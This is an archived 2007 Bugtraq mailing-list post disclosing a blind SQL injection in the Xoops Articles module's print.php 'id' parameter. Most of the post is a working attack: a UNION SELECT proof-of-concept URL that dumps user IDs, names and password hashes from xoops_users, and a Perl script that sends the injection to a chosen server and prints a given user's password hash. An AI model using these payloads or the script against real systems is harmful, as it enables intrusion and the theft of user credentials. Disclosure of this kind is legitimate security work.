lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list] 
Date: 27 Mar 2007 05:48:24 -0000
From: UniquE@...quE-Key.Org
To: bugtraq@...urityfocus.com
Subject: Xoops All Version -Articles- Print.PHP (ID) Blind SQL Injection
 Exploit And PoC

Xoops All Version -Articles- Print.PHP (ID) Blind SQL Injection Exploit And PoC

Type :

SQL Injection

Release Date :

{2007-03-26}

Product / Vendor :

Xoops Portal

http://www.Xoops.Org

Bug :

http://localhost/script/modules/articles/print.php?id=x AND 1=1 or 1=0

PoC :

http://localhost/script/modules/articles/print.php?id=3/**/UNION/**/SELECT/**/NULL,NULL,NULL,NULL,uid,uname,pass,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL/**/FROM/**/xoops_users/**/LIMIT/**/1,1/*

Exploit :

#!/usr/bin/perl -w

#############################################
#Exploit Coded By UNIQUE-KEY[UNIQUE-CRACKER]#
#############################################

use IO::Socket;

if (@ARGV != 3)
{
    print "\n-----------------------------------\n";
    print "Xoops All Version -Articles- Print.PHP (ID) Blind SQL Injection Exploit\n";
    print "-----------------------------------\n";
    print "\nUniquE-Key{UniquE-Cracker}\n";
    print "UniquE[at]UniquE-Key.ORG\n";
    print "http://UniquE-Key.ORG\n";
    print "\n-----------------------------------\n";
    print "\nUsage: $0 <server> <path> <uid>\n";
    print "Examp: $0 www.victim.com /path 1\n";
    print "\n-----------------------------------\n";
    exit ();
}

$server = $ARGV[0];
$path = $ARGV[1];
$uid = $ARGV[2];

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server",  PeerPort => "80");
printf $socket ("GET %s/modules/articles/print.php?id=3/**/UNION/**/SELECT/**/NULL,NULL,NULL,NULL,NULL,pass,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL/**/FROM/**/xoops_users/**/WHERE/**/uid=$uid/* HTTP/1.0\nHost: %s\nAccept: */*\nConnection: close\n\n",
$path,$server,$uid);

while(<$socket>)

{
    if (/\>(\w{32})\</) { print "\nID '$uid' User Password :\n\n$1\n"; }
}

Tested :

All Version

Author :

UniquE-Key{UniquE-Cracker}
UniquE(at)UniquE-Key.Org
http://www.UniquE-Key.Org

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ